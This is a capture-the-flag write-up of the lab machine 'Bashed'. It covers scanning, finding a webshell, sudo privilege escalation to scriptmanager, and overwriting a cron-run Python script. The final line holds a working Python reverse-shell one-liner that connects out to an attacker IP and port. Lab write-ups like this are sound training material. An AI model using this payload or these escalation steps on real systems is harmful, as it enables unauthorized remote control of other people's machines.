The nmap scan reveals only one port: Port 80 with a apache web server.
PORT STATE SERVICE VERSION 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) |_http-title: Arrexel's Development Site |_http-server-header: Apache/2.4.18 (Ubuntu)
Visiting the website, we see a PHP development page with some kind of blog.
php/sendMail POST endpoint, but we cannot see the response. Next, I ran a gobuster scan over the website and found some interesting directories:
/images (Status: 301) [Size: 315] [--> http://10.129.29.137/images/] /uploads (Status: 301) [Size: 316] [--> http://10.129.29.137/uploads/] /php (Status: 301) [Size: 312] [--> http://10.129.29.137/php/] /css (Status: 301) [Size: 312] [--> http://10.129.29.137/css/] /dev (Status: 301) [Size: 312] [--> http://10.129.29.137/dev/] /js (Status: 301) [Size: 311] [--> http://10.129.29.137/js/] /fonts (Status: 301) [Size: 314] [--> http://10.129.29.137/fonts/] /server-status (Status: 403) [Size: 301]
/dev/ directory leads to a webshell.
From there, we can get the user flag. Next, I run LinEnum and LinPeas to get some hints how to move on.
sudo -i reveals that we the user
scriptmanager can run all commands without password:
www-data@bashed:/tmp$ sudo -l sudo -l Matching Defaults entries for www-data on bashed: env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin User www-data may run the following commands on bashed: (scriptmanager : scriptmanager) NOPASSWD: ALL
And here, I made some mistakes. I tried to move to scriptmanager with
su, but this did not work as it’s prompting for the password I don’t have:
www-data@bashed:/tmp$ su scriptmanager -c bash su scriptmanager -c bash Password:
However, THIS one works:
www-data@bashed:/$ sudo -u scriptmanager /bin/bash sudo -u scriptmanager /bin/bash scriptmanager@bashed:/$
This enables us to enter the
scripts folder where we can find a script that is apparently running every minute - it is reading in the file
test.txt and writing its content, so that its timestamp is constantly changing.
$ cat test.py f = open("test.txt", "w") f.write("testing 123!") f.close
By replacing the file content with a reverse shell python script, we get a root shell.
$ echo 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")' > test.py